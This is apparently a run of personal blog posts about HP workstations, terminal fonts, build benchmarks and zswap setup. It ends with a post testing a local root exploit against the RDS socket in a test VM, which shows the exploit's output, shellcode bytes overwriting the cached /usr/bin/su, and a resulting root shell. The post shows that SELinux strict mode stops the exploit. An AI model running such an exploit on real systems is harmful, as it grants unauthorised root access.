One interesting thing is that it has an adaptor from SATA power to 8 pin PCIe power. According to Wikipedia the 8 pin connector provides 150W at 12V [2]. According to Wikipedia SATA power cables include 3 12V pins each of which can deliver 1.5A [3] which is 54W. The system as I received it had a single SATA power plug connected so potentially 150W could be drawn from a connector designed for 54W. The first thing I did was to connect a second SATA power connector on the same cable so I could have connectors designed for a total of 108W supplying potentially 150W (and definitely more than 75W).
I found two versions of the specs for this system, this version seems to match what I bought as it references W-21xx CPUs [4] while this version matches what I would rather have with a W-22xx CPU [5]. The URL naming scheme implies that there are potentially at least a few other variants out there. So much for the “buy name brand and you can buy two systems with the same model and have them work the same” benefit you hope to get. Why don’t they just name them “G4.1”, “G4.2”, etc?
It seems that W-21xx and W-22xx CPUs are incompatible, so the W-2295 scoring 30,804 multithread and 2,634 single thread on passmark that I hoped to get isn’t an option [6].
The system is well designed for space efficiency, both it and the Z640 are 17cm wide but the Z4G4 allows my to close the lid with the Intel Battlemage card installed which doesn’t come close to fitting in a Z640. It has 8 DIMM sockets and with the ready availability of 32G DIMMS that allows 256G of RAM which is the maximum the motherboard supports. That compares well to the Z640 that only has 4 DIMM slots and the Z6G4 which only has 6.
The system supports a maximum RAM speed of DDR4-2666 which is better than the DDR4-2400 of the Z640 but less than the DDR4-2933 of the Z6G4.
The NVMe sockets on the motherboard are a convenient feature. Most systems I run need at most two NVMe devices so this saves a PCIe slot which is important when dealing with GPUs that take 2+ slots. Also for systems that don’t really need NVMe I can use some of the small NVMe devices that I have no other use for. 128G NVMe devices aren’t even worth selling and 256G will be of little use in the near future. So when I move to gen4 Z servers I can use up some of them without wasting slots.
Using the lesser socket LGA2066 in the Z4G4 is a minor annoyance, but for a single socket system 18 cores is probably enough.
The BIOS has an option for single-socket NUMA, which is basically locking cores in a single CPU to specific RAM channels. I enabled it but it did nothing presumably because I only have 2 DIMMs. When I get more DIMMs I’ll do some tests of that and compare it with NUMA on my Z840.
There are many different variants of the Z4G4 and the only way to recognise them is by the CPU not by any part number or serial number AFAIK. The first difference is between server grade CPUs (the W-2xxx CPUs) and desktop grade CPUs (the i7 and i9 CPUs). The systems with i7 and i9 CPUs don’t support ECC RAM which makes them less reliable, gives smaller limits for RAM
The below table compares the Z640 which is my current desktop PC with the Z4G4, Z6G4, and Z8G4 systems. For the latter 3 I have included multiple options for the parts that differ in different models in the same name series. The Z4G4 I have is an early one which only supports W-21xx CPUs which means a maximum RAM speed of 2666 and the best possible CPU would only be 15% faster than my Z640. I can only use this for ML stuff as it’s the only system I have with REBAR support (which works well).
| Z640 (1 socket) | Z4G4 | Z6G4 (1 socket) | Z8G4 | |
|---|---|---|---|---|
| DIMM slots | 4 | 8 | 6 | 24 |
| Max DDR4 speed | 2400 | 2666/2933 | 2666/2933 | 2666/2933 |
| Max DIMM size | 32G | 64G | 64G | 64G/128G |
| System Max Ram | 128G | 512G | 192G/384G | 1.5T/3T |
| CPU Socket | LGA2011-3 | LGA2066 | LGA3647 | LGA3647 |
| Best CPU | E5-2699A v4 | W-2195/W-2295 | Platinum 8180/W-3275 | Platinum 8180/8280 |
| Motherboard NVMe | 0 | 2 | 2 | ? |
In my previous blog post I concluded that the next step up for me would be DDR5 systems [10]. But now some of the LGA3647 systems are appealing. The Z8G4 would be a decent upgrade from my current Z840 build server and should be affordable long before any two socket DDR5 system becomes affordable.
The Z4G4 doesn’t have any potential for useful upgrades. But for me it was a good cheap way to house a GPU that had already damaged the motherboard of one good system. If the Z4G4 has a PCIe slot break the way my Z840 did then it wouldn’t bother me a lot. It was annoying to discover how limited this variant of the Z4G4 is after buying it, but at that price I can’t complain.
A Z6G4 could be a nice workstation if I found one at a really low price. The only reason I’d seek one out is if I had a need for a desktop workstation with REBAR support, which seems unlikely.
In 2019 I blogged about getting a 4K monitor because of my vision being inadequate for a 2560*1440 monitor [1]. Now I’m using a 40″ 5120*2160 monitor [2] and still trying to find the correct balance between how much I want to see on the screen and what I am physically capable of seeing on screen.
Currently Kitty is my terminal emulator of choice [3]. What I most like about it is the feature of having multiple terminal windows in a single OS window, so instead of having 9 or 16 different xterm instances running all with possible alignment issues I have a single window for all terminals which can be brought to the foreground. The impending 6.7 release of KDE (my favourite Linux desktop environment) [4] includes the feature of per-screen virtual desktops which might be the feature I need to make multiple monitors usable for me. One of the factors stopping me from using multiple monitors in the past was the issue of not getting the alignment of dozens of xterms right if a monitor goes to sleep mode and is regarded as disconnected, moving a few Kitty windows is much easier than moving dozens of xterms (also a tiling window manager isn’t my style).
I’ve just decided that the Terminus font (my favourite out of the monospaced fonts in Debian) is too small for me at 9.0 point. But then I tried 10.0 which looked really ugly and an experiment showed that 10.5 looked good.
This is the best explanation I’ve seen of how ridiculous the whole font point thing is [5]. It doesn’t and won’t ever correlate to pixels. So what we ideally want to do is set the size on screen to match the actual pixel size of the font. I can’t find any software to interrogate a font file and find out what sizes it supports. The web page for the Terminus font says that it supports 6×12, 8×14, 8×16, 10×18, 10×20, 11×22, 12×24, 14×28 and 16×32 [6]. So the question is how to get a terminal program that uses one of those.
Kitty doesn’t and won’t support specifying font size by pixel. I tried some other terminal programs, I started with the Debian Wiki page TerminalEmulator [7] which wasn’t very helpful, I added some new entries to that page. There doesn’t seem to be another option for a terminal emulator with multiple terminals in one OS window that can arrange them automatically. I didn’t even get to the stage of checking whether other terminal emulators supported font size in pixels.
The lcdf-typetools package contains the program otfinfo which gives some interesting information on fonts but nothing about the font sizes in pixels.
Sites like Coding Font to compare fonts [8] can never work properly as the fonts will always be slightly different sizes as the same point size doesn’t mean the same display size.
On my 5120*2160 monitor with 9 Kitty terminal sessions with 9.0 point font they each have 277*50 characters. With 10 point it’s 237*46 but fuzzy and unpleasant to read. With 10.5 point it’s 208*43 which isn’t as good as I’m used to but is still almost 4.5* as many characters as the original 80*25 standard for terminals.
Some time before 2019 I had a 4*4 array of terminal windows that were 100*25 or 120*25. That left some space at the right and bottom so I could open another 8 or 9 terminals that were partially obscured if I needed to. By 2019 before getting a 4K monitor I had a 3*3 array of terminal windows as my standard desktop and a larger monitor that did 4K resolution allowed me to have 16+ terminals again. Now with Kitty I routinely have 9 terminals in a 3*3 array and I can easily open more if I need them and have them resize appropriately.
This situation works reasonably well, but the element of just trying different sizes in 0.5 point increments until I find something that looks good is unpleasant. I should be able to specify the next largest increment of the bitmaps in the font and just have it look good.
It would be good if more people tested the terminal emulators in Debian and added information to the wiki page about them. The current page is useful but needs more information to support the variety of features that people find important.
We need some tools to provide information on fonts in Debian, such as the sizes of bitmapped fonts.
The whole point size thing is just wrong and would ideally go away. The vast majority of font use nowadays is for things that will probably never end up on a printed page so trying to map it to a physical size in fractions of an inch makes no sense. But that’s just one of many horrible things used for backwards compatibility that aren’t going to go away any time soon. Really everything involving inches should go away.
I have just bought a HP Z4 G4 with W-2125 CPU for $320 and I decided it was a good time to do some benchmarks on Debian package building to see which system I should use for that.
The W-2125 CPU scores only 9,954 on the passmark multithread test but scores 2,546 on single thread [1]. Passmark seems to have some limitations as the only DDR3 system that’s important to me at the moment (the HP Z420 workstation my parents use which cost me $750 in 2021) with a E5-2620 CPU scoring 5,325 for multithread and 1,113 for single thread [2]. From the passmark results one would expect that the system is slightly more than twice as fast as the Z420 for operations that involve less than 4 CPU cores.
For the initial tests of the Z4 G4 I ran them with hyper-threading enabled as 4 cores isn’t much by today’s standards and also the machine in question is going to be less exposed to hostile data and contain less secret data than most of my systems so the security risks of hyper-threading are less of a concern.
I did some tests with a couple of tasks that are very important to me, building SE Linux policy packages (something I may do a dozen times in a day) and building Warzone 2100 (which I do less often but is the most intensive build process I regularly run). At the bottom of this post there are tables with the results from building these packages on my Z640 workstation with a E5-2696 v4 CPU [3], the Z420, and the new machine.
For the Warzone 2100 package I tested building on my Z840 dual CPU system [4]. I didn’t test building the SE Linux policy on the Z840 this time because that package can’t take advantage of even 22 cores. When I initially got the Z840 running it built the policy packages faster because the Z640 had an older CPU that was slower for single core operations than the CPUs in the Z840.
For some time I have noticed significant differences in compile time on my workstation, a factor of more than 2. I did more tests and noticed that “top” showed something like the following, those kernel threads are all BTRFS related, except for “gfx” which is probably something graphical caused by running Chrome with about 300 tabs open.
2144316 root 20 0 0 0 0 I 26.6 0.0 0:36.76 kworker/u88:20-btrfs-endio-write 2221470 root 20 0 0 0 0 I 23.7 0.0 0:01.85 kworker/u88:12-gfx 2221436 root 20 0 0 0 0 I 15.1 0.0 0:07.48 kworker/u88:8-btrfs-compressed-write 2166191 root 20 0 0 0 0 I 12.8 0.0 0:15.80 kworker/u88:23-btrfs-compressed-write 2126387 root 20 0 0 0 0 I 10.2 0.0 1:29.11 kworker/u88:4-events_unbound
I had been running BTRFS with the mount option “compress=zstd:15” which caused much of the performance problems when building. It was also a random performance issue which I think happened due to the BTRFS 30 second write-back sometimes taking more than 30 seconds during the build process which then caused a second write-back.
I did tests on ZSTD compression levels 5, 8, 10, and 15. 15 was never good and often really bad. 10 was not unbearable but consistently slower. 8 was sometimes as fast as 5 and sometimes quite a bit slower. I didn’t test levels below 5 because I need to have some compression and it seemed that the benefits of reducing compression were dropping off below 8.
I found that the BTRFS compression delay is not counted in system time for the process. I think it’s the fsync() system calls in the semodule and dpkg-deb programs that cause the delays related to BTRFS compression waiting for kernel threads.
I have all my systems other than laptops running BOINC in the background so that CPU power is used for scientific research when I don’t have any personal use for it [5]. I believe that it’s immoral to waste CPU power when it could be used for research.
In the below table which has test results from building the package with and without BOINC, and with different ZSTD compression levels in BTRFS all the worst entries were from when BOINC was running apart from one where ZSTD level 15 compression was used. The really poor performance with ZSTD level 15 was an outlier, but it wasn’t an uncommon outlier so I left it in.
Running BOINC in the background configured to use all CPU cores caused a significant increase in “user CPU time” (the time a CPU core spent actually running the program). My initial thought was that it’s partly related to “turbo boost”.
The Intel ARK page for the CPU in the Z420 shows that it’s main clock speed is 2.0GHz with a 2.5GHz “turbo boost” [6]. The “turbo boost” is apparently largely based on temperature and apparently limited to one core, so if the other CPU cores are all being used then the CPU will probably be too hot to have the turbo boost and if it happens it might not happen for my compile processes.
The ARK page for the E5-2699 v4 (which is a similar CPU to the E5-2696 v4 that I’m using but is officially documented by Intel) [7] shows that it has a base clock speed of 2.2GHz and a turbo boost speed of 3.6 GHz. 322 vs 244 seconds of user CPU time means running 32% slower which can plausibly be explained by the lack of a 64% turbo boost with a bit of help from the 55MB L3 cache being thrashed.
Turbo boost would only be a noticeable issue for building packages like the SE Linux policy packages which doesn’t take much advantage of multi-core CPUs. For a build process to average at best 362% CPU use there has to be large parts of the process that are limited to one or two cores which can potentially give a benefit from turbo-boost.
When building the Warzone 2100 packages most of the build time is running basis-universal which is a multi-threaded program to compress GPU texture data. This usually causes a load average of 300+ on the Z640 or 600+ on the Z840. But the build time is still increased by more than 50% on both the Z640 and the Z840 when BOINC is running in the background, which seems to be an indication that it’s not related to turbo boost. I verified that BOINC is running at IDLE schedule priority with the following command:
# chrt -p $(pidof -s einstein_O4MD_2.01_x86_64-pc-linux-gnu) pid 2974874's current scheduling policy: SCHED_IDLE pid 2974874's current scheduling priority: 0
In theory this means that BOINC won’t affect foreground processes.
The best claims I’ve seen about HT are 15% to 30% performance boost. The best I’ve actually seen in the past is about 18%. Seeing a 10% benefit for building Warzone 2100 is at the low end of the range I expected. 8 virtual cores is not many for a build process that causes a load average of 600+ when running on a system with 44 real cores.
I was surprised to see a 6% performance benefit in hyper-threading for building the SE Linux policy as I didn’t think there was enough use of threading or multiple processes to allow that.
Many build scripts use a number of processes that match the number of apparent CPU cores. While “make -j 88” might give a theoretical performance benefit on a 44 core system it will also take a lot of RAM and any paging will outweigh the benefits of hyper-threading. On a system with only 4 real cores there’s less potential for using too much RAM and as security isn’t so important on that system I will leave it on.
The best results of the Z640 and Z4G4 are only 50% faster than the best results of the Z420.
The Z420 has a E5-2620 CPU which is far from the fastest CPU available for that system – the E5-2687W has 8 cores and rates 10,021/1,669 on passmark [8] which is far better than the 5,331/1,114 the E5-2620. The E5-2687W is the fastest CPU that HP lists as supported by the Z420 and it supports DDR3-1666 RAM as opposed to the DDR3-1333 that is the fastest that the E5-2620 supports. With suitable hardware upgrades the Z420 would probably only take about 20% longer to do builds of the SE Linux policy and other packages that can’t take advantage of more than 8 CPU cores.
The Z4G4 system has 4 RAM channels which means that you should get some performance benefits from having 4 DIMMs, my system currently has 2 and I haven’t yet managed to get more DDR4-2666 DIMMs. But I’d still expected a W-2125 CPU with 2*DDR4-2666 DIMMs outperform any E5-26xx CPU with 4*DDR4-DDR-2400 DIMMs for tasks that average less than 4 CPU cores.
In retrospect I would have been better off getting a HP Z820 (two socket server with DDR3 RAM) than the first DDR4 systems I got. It seems that for reasonable size builds a two socket system comes close to twice the speed of a single socket system. I did briefly own a HP ML350 two CPU system with DDR3 RAM but it was too noisy for my intended use as a deskside workstation so I sold it.
I plan to do more investigation on BTRFS compression, how to get the best compression without excessive delays and how to recognise when delays are happening. I have some SSDs that have sustained write speeds as low as 15MB/s (Crucial P1 series) so for those I could probably have very high compression levels without slowing the system down.
The fact that BIONC slows things down so much seems to be a bug. When processes are running with the IDLE scheduling class there shouldn’t be such significant delays. Is it due to cache thrashing? How can I best get BOINC suitably throttled when I’m sitting at my workstation, I don’t want BOINC connecting to the local X server (which it repeatedly tries to do). Do I need to tune my kernel for better handling of IDLE scheduling?
When I get more DIMMs in the Z4G4 I need to do more tests to see if it gives an overall performance boost.
Also the Z4G4 system has a BIOS option for “sub NUMA” which basically means treating the different RAM channels on a single CPU as NUMA zones, I enabled that option which does nothing presumably because I only have 2 DIMMs, the results when I have 4 DIMMs will be interesting. I will also do some NUMA tests on the Z840 to see what benefits it gives.
I have a selection of RAM speeds that will work in the Z4G4, if I have enough spare time I’ll test what difference that makes for CPU bound tasks that matter to me.
For package building fsync() is not helpful, if the system crashes before it’s done then I will just do the build again. For a build cluster it is probably a good feature and probably doesn’t affect aggregate performance when multiple packages are built at the same time, but for the single user case probably not. I will investigate libeatmydata for package building [9].
The progress in CPUs seems to have slowed down a lot recently. The main benefits seem to be in more CPU cores and for newer sockets with more RAM channels.
The CPUs that do have improvements in single core performance are the i9 series (which mostly doesn’t come with motherboards supporting ECC) and AMD CPUs (which is rare in enterprise class hardware). Maybe I should get a server with an i9 or AMD CPU for tasks that need a fast turn around with a small number of cores. That would probably outperform any CPU designed for large core counts for things like building the policy and setting up test VMs (which depends on package installation speed that is single core bottlenecked).
The W-21xx CPUs seem to offer little benefit over the E5-26xxv4 CPUs and not a lot of benefit over E5-26xx CPUs (with DDR3). Even the W-22xx CPUs look like they aren’t going to offer a lot as they are only an incremental improvement over the W-21xx series. I had considered making the Z4G4 my main desktop workstation after the high end W CPUs become affordable, but it looks like that won’t be worth it until such CPUs drop from the current ebay price of $900 to $100.
I think I’ll keep waiting for a decent socket LGA3647 or DDR5 based server [10] for my next significant upgrade.
| System | BOINC | Compression | CPU Time | Elapsed | CPU% |
|---|---|---|---|---|---|
| Z640 | no | 8 | 248.82user 55.58system | 1:23.88elapsed | 362%CPU |
| Z4G4 | no | 5 | 245.15user 34.63system | 1:24.93elapsed | 329%CPU |
| Z640 | no | 5 | 244.75user 34.87system | 1:25.98elapsed | 325%CPU |
| Z4G4 | no | 10 | 245.21user 35.64system | 1:29.63elapsed | 313%CPU |
| Z640 | no | 8 | 248.71user 55.90system | 1:33.01elapsed | 327%CPU |
| Z640 | no | 10 | 250.90user 55.78system | 1:42.12elapsed | 300%CPU |
| Z640 | yes | 8 | 298.19user 69.30system | 1:59.77elapsed | 306%CPU |
| Z640 | yes | 10 | 300.58user 68.90system | 2:01.53elapsed | 304%CPU |
| Z420 | no | 5 | 359.01user 44.95system | 2:07.33elapsed | 317%CPU |
| Z640 | yes | 5 | 322.40user 71.82system | 2:34.66elapsed | 254%CPU |
| Z420 | yes | 5 | 372.03user 42.95system | 2:42.15elapsed | 255%CPU |
| Z640 | yes | 15 | 299.26user 67.18system | 2:59.77elapsed | 203%CPU |
| Z640 | no | 15 | 250.05user 54.60system | 3:07.61elapsed | 162%CPU |
| System | BOINC | Compression | CPU Time | Elapsed | CPU% |
|---|---|---|---|---|---|
| Z840 | no | 10 | 6549.21user 89.46system | 4:18.90elapsed | 2564%CPU |
| Z840 | no | 5 | 6533.81user 90.50system | 4:19.24elapsed | 2555%CPU |
| Z640 | no | 5 | 7040.87user 183.12system | 7:13.50elapsed | 1666%CPU |
| Z840 | yes | 5 | 8039.52user 169.62system | 8:02.86elapsed | 1700%CPU |
| Z640 | yes | 5 | 7486.44user 205.03system | 11:09.97elapsed | 1148%CPU |
| Z4G4 | no | 5 | 7891.32user 74.45system | 17:48.03elapsed | 745%CPU |
| Z4G4 | no | 10 | 7942.10user 77.43system | 17:58.72elapsed | 743%CPU |
| Build | HT | Compression | CPU Time | Elapsed | CPU% |
|---|---|---|---|---|---|
| Warzone | yes | 5 | 7891.32user 74.45system | 17:48.03elapsed | 745%CPU |
| Warzone | yes | 10 | 7942.10user 77.43system | 17:58.72elapsed | 743%CPU |
| Warzone | no | 5 | 4492.45user 59.09system | 19:59.01elapsed | 379%CPU |
| Warzone | no | 10 | 4497.28user 59.46system | 20:07.15elapsed | 377%CPU |
| Refpolicy | yes | 5 | 245.15user 34.63system | 1:24.93elapsed | 329%CPU |
| Refpolicy | yes | 10 | 245.21user 35.64system | 1:29.63elapsed | 313%CPU |
| Refpolicy | no | 5 | 180.84user 29.74system | 1:32.30elapsed | 228%CPU |
| Refpolicy | no | 10 | 180.29user 30.07system | 1:35.01elapsed | 221%CPU |
The Register has an informative article about the threat that management systems built in to Intel and AMD CPUs pose to data sovereignty in EU owned cloud providers [4]. But this is just the first stage of building sovereign clouds, all significaant cloud services run at least 2 types of CPU and adding EU manufactured CPUs at a future time will be easy.
Michael Prokop wrote an interesting blog post about debugging input event problems on Linux which turned out to be due to an analogue headphone connection [8]. This gave me some useful pointers to investigating an input device problem which is probably very different.
Tianon Gravi wrote an informative blog post about containers, Debian, and Docker options [12]. We need a lot more work on these sorts of things in Debian.
Last year I blogged about using Zram for VMs [1]. That setup is still working well for VMs and for phones and laptops with no swap device.
I have just read Chris Down’s insightful blog post about Zswap vs Zram [2] which convinced me to setup Zswap on some systems. I have had some of the problems that were described in his blog post when trying to run Zram on workstation and server systems.
One limitation of zswap is that it doesn’t allow specifying the compression level. For zram I can put the following in /etc/systemd/zram-generator.conf to set the zstd compression level (this works well on my Thinkpad X1 Carbon Gen6):
[zram0] compression-algorithm=zstd(level=10)
For the BTRFS filesystem I can put “compress=zstd:13” in the mount options to specify the compression level. They really should support different compression levels in zswap. The ideal compression level depends on the speed of the CPU and new CPUs keep getting faster.
The documentation says to use something like the following on the kernel command-line to enable zswap:
zswap.enabled=1 zswap.compressor=zstd zswap.max_pool_percent=20 zswap.shrinker_enabled=1
The max_pool_percent=20 setting is the default which means to use up to 20% of system RAM for compressed data. I’ve seen documentation sugesting up to 50% which seems a little excessive.
Note that a lot of documentation says to use zswap.zpool=z3fold, but z3fold is going to be removed and zsmalloc (the default) is recommended [3].
There is documentation about changing the compression algorithm via command line parameters, on Debian only lzo is linked in to the kernel and zstd (my preferred option) is a module so the kernel command line can’t be used to set zstd, but the following command works:
echo zstd > /sys/module/zswap/parameters/compressor
The shrinker_enabled option is to allow the kernel to evict cold pages without waiting for memory pressure.
You can enable zswap without rebooting by running commands like the following. You could even put them in /etc/rc.local or something, but I think putting it in the kernel command line is a good idea as it makes it obvious to the next sysadmin what is happening.
echo 1 > /sys/module/zswap/parameters/enabled echo zstd > /sys/module/zswap/parameters/compressor echo 1 > /sys/module/zswap/parameters/shrinker_enabled
The following command is documented as a way of finding out what zswap is doing:
# grep -r . /sys/kernel/debug/zswap/ /sys/kernel/debug/zswap/stored_pages:262541 /sys/kernel/debug/zswap/pool_total_size:455266304 /sys/kernel/debug/zswap/written_back_pages:384 /sys/kernel/debug/zswap/reject_compress_poor:0 /sys/kernel/debug/zswap/reject_compress_fail:160911 /sys/kernel/debug/zswap/reject_kmemcache_fail:0 /sys/kernel/debug/zswap/reject_alloc_fail:0 /sys/kernel/debug/zswap/reject_reclaim_fail:0 /sys/kernel/debug/zswap/pool_limit_hit:0
The following command gives the zswap compression level which gives a result of 2.36 for this example:
echo "scale=2; " $(</sys/kernel/debug/zswap/stored_pages) " * $(getconf PAGESIZE) /" $(</sys/kernel/debug/zswap/pool_total_size) | bc
This table documents my current understanding of the debug values. The difference between reject_compress_fail and reject_compress_poor isn’t clear in a lot of the documentation, even reading the source didn’t make it easy to understand.
| File | Meaning (LC is lifetime count) |
|---|---|
| pool_limit_hit | LC pool limit hit and pages are forced to the swap partition |
| pool_total_size | RAM used for zswap data |
| reject_alloc_fail | LC can’t allocate memory because max_pool_percent has been reached |
| reject_compress_fail | LC of pages with a compression algorithm failure so go straight to swap partition |
| reject_compress_poor | LC of pages that can’t compress so go straight to swap partition |
| reject_kmemcache_fail | LC kernel malloc failure (serious problem?) |
| reject_reclaim_fail | LC failure to move a page from compressed RAM to disk – serious problem! |
| stored_pages | Swapped pages stored by zswap |
| written_back_pages | LC of pages written back to swap partition from zswap |
All of this is not nearly as easy to understand as the following command for zram:
# zramctl NAME ALGORITHM DISKSIZE DATA COMPR TOTAL STREAMS MOUNTPOINT /dev/zram0 zstd 7.7G 2.1G 375M 386M 4 [SWAP]
The Debian Wiki page about Zswap is very brief [4] and needs more description about this, I think a lot of Debian users will use zram instead of zswap because setting up zram is just a single apt command. I’m not planning to immediately add to that wiki page because I’m not an expert on this, I would appreciate comments on this blog post from others who have got zswap working. I will update the wiki if others report matching experiences to mine.
I’m now using zswap on a few systems including my main home workstation which had performed poorly with zram and a swap device in the past. If that goes well I’ll put it on other systems.
I wrote the following shell script to display zswap stats, consider it GPL if you want to use it:
#!/bin/bash if [ ! -f /sys/kernel/debug/zswap/stored_pages ]; then echo "ZSwap not enabled" exit 0 fi PAGES=$(</sys/kernel/debug/zswap/stored_pages) PAGESIZE=$(getconf PAGESIZE) RAM=$(echo "$PAGESIZE * " $(getconf _PHYS_PAGES) | bc) POOL=$(</sys/kernel/debug/zswap/pool_total_size) if [ "$POOL" == "0" ]; then echo "ZSwap not used yet" exit 0 fi COMP=$(</sys/module/zswap/parameters/compressor) echo -n "$COMP compression ratio: " echo "scale=2; $PAGES * $PAGESIZE / $POOL" | bc echo -n "RAM%: " echo "100 * $POOL / $RAM" | bc]]>
When I run the exploit as user_t I see the following in the audit log:
type=PROCTITLE msg=audit(1779615031.043:15540): proctitle="./exp"
type=AVC msg=audit(1779615031.043:15541): avc: denied { create } for pid=1360 comm="exp" scontext=user_u:user_r:user_t:s0 tcontext=user_u:user_r:user_t:s0 tclass=rds_socket permissive=0
type=SYSCALL msg=audit(1779615031.043:15541): arch=c000003e syscall=41 success=no exit=-13 a0=15 a1=5 a2=0 a3=0 items=0 ppid=879 pid=1360 auid=1000 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=pts0 ses=1 comm="exp" exe="/home/test/b/pocs/pintheft/exp" subj=user_u:user_r:user_t:s0 key=(null)ARCH=x86_64 SYSCALL=socket AUID="test" UID="test" GID="test" EUID="test" SUID="test" FSUID="test" EGID="test" SGID="test" FSGID="test"
The last of the output of running the exploit is the following:
[-] only stole 0/1024 refs â may not be enough [-] too few stolen refs, aborting [-] attempt 5 failed, retrying... [-] all 5 attempts failed
When I run it as unconfined_t it gave the same output and stracing it had many of the following:
socket(AF_RDS, SOCK_SEQPACKET, 0) = -1 EAFNOSUPPORT (Address family not supported by protocol)
After I ran “modprobe rds” the exploit worked as unconfined_t with the following output:
[*] verifying page cache overwrite... [*] page cache page 0 AFTER overwrite (our shellcode) (129 bytes): 0000: 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 |.ELF............| 0010: 03 00 3e 00 01 00 00 00 68 00 00 00 00 00 00 00 |..>.....h.......| 0020: 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |8...............| 0030: 00 00 00 00 40 00 38 00 01 00 00 00 05 00 00 00 |....@.8.........| 0040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 0050: 2f 62 69 6e 2f 73 68 00 81 00 00 00 00 00 00 00 |/bin/sh.........| 0060: 81 00 00 00 00 00 00 00 31 ff b0 69 0f 05 48 8d |........1..i..H.| 0070: 3d db ff ff ff 6a 00 57 48 89 e6 31 d2 b0 3b 0f |=....j.WH..1..;.| 0080: 05 |.| [+] verification PASSED â page cache overwritten with SHELL_ELF [+] executing /usr/bin/su (now contains setuid(0) + execve /bin/sh)... === RESTORE: sudo cp /tmp/.backup_su_13294 /usr/bin/su && sudo chmod u+s /usr/bin/su === #
SE Linux in a “strict” configuration stops this exploit.
The test VM is running Debian/Testing, I haven’t bothered investigating whether it’s a default setting for Debian to not load the rds module or whether it was some change that I made either directly or indirectly. Security via SE Linux is of more interest to me than security via controlling module load.
]]>